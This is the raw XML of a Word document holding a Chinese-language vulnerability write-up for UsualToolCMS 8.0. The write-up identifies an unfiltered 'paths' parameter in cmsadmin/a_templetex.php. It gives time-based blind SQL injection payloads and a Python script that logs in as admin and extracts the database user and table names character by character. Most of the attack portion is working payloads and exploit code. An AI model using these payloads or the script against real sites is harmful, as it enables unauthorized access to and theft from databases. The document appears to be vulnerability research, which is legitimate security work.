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6030-1567389407948"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1.环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="1" w:name="6190-1567389436913"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:t>环境版本信息：UsualToolCMS-8.0-Release</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="2" w:name="5014-1567389430132"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:t>版本下载：http://www.a5xiazai.com/php/140604.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="3" w:name="1492-1567389430132"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:t>官网下载：https://cms.usualtool.com/down/UsualToolCMS-8.0-Release.zip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="4" w:name="3817-1567389441272"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="5" w:name="9045-1567389441747"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="393939"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.漏洞分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="6" w:name="9728-1567389450578"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:t>在./cmsadmin/a_templetex.php文件第137行，paths变量没有过滤，136行从get处获取paths，没有任何过滤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="7" w:name="9285-1567389535997"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5267325" cy="2149475"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1460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" w:name="7510-1567389535997"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:t>当从get处获得的t等于open时就可以出发这个sql注入，在文件第129行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="9" w:name="5855-1567389577940"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5267325" cy="1057275"/>
            <wp:effectExtent l="0" t="0" r="5715" b="952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" w:name="2070-1567389577940"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:t>构造payload：cmsadmin/a_templetex.php?t=open&amp;id=1&amp;paths=templete/index' where id=1 and if(ascii(substring(user(),1,1))&gt;0,sleep(5),1)--+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="11" w:name="7016-1567389649059"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5267325" cy="3944620"/>
            <wp:effectExtent l="0" t="0" r="5715" b="254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" w:name="7545-1567389649059"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:t>由于是时间盲注，编写延迟注入脚本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# -*- coding:utf-8 -*-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import time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import requests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session = requests.session()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headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0'}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img_url = 'http://192.168.8.108:8081/UsualToolCMS-8.0-Release/class/UsualToolCMS_Code.php?r=13720'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img_req = session.get(url=img_url,headers=headers).content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with open('pic.png','wb') as f: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f.write(img_req)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code = input('请输入验证码：')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data = {</w:t>
      </w:r>
      <w:bookmarkStart w:id="18" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="18"/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'uuser':'admin',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'upass':'admin',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'ucode':code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payloads = list('root@localhostasfafsasf')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url = 'http://192.168.8.108:8081/UsualToolCMS-8.0-Release/cmsadmin/a_login.php?do=login'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response = session.post(url=url,headers=headers,data=data)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res_url_1 = "http://192.168.8.108:8081/UsualToolCMS-8.0-Release/cmsadmin/a_templetex.php?t=open&amp;id=1&amp;paths=templete/index' where id=1 and if(ascii(substring(user(),{},1))={},sleep(5),1)--+"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result = ''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for i in range(1,15):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for payload in payloads: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   res_url_2 = res_url_1.format(str(i),ord(payload))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   start_time = time.time()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   response = session.get(url=res_url_2,headers=headers)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   if time.time() - start_time &gt; 7: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       result = result + payload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       print(result)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         break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353300" cy="3552825"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1333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13" w:name="4035-1567389660596"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkStart w:id="14" w:name="2133-1567389933109"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5267325" cy="1416685"/>
            <wp:effectExtent l="0" t="0" r="5715" b="63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5" w:name="6881-1567389684784"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:t>爆数据库表payload：cmsadmin/a_templetex.php?t=open&amp;id=1&amp;paths=templete/index' where id=1 and if(ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&gt;0,sleep(5),1)--+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="16" w:name="7614-1567389905715"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5267325" cy="3944620"/>
            <wp:effectExtent l="0" t="0" r="5715" b="254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7" w:name="9998-1567389905715"/>
      <w:bookmarkEnd w:id="17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B0116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2019-09-02T02:06:00Z</dcterms:created>
  <dc:creator>Apache POI</dc:creator>
  <cp:lastModifiedBy>fanxing</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-09-02T02:07:38Z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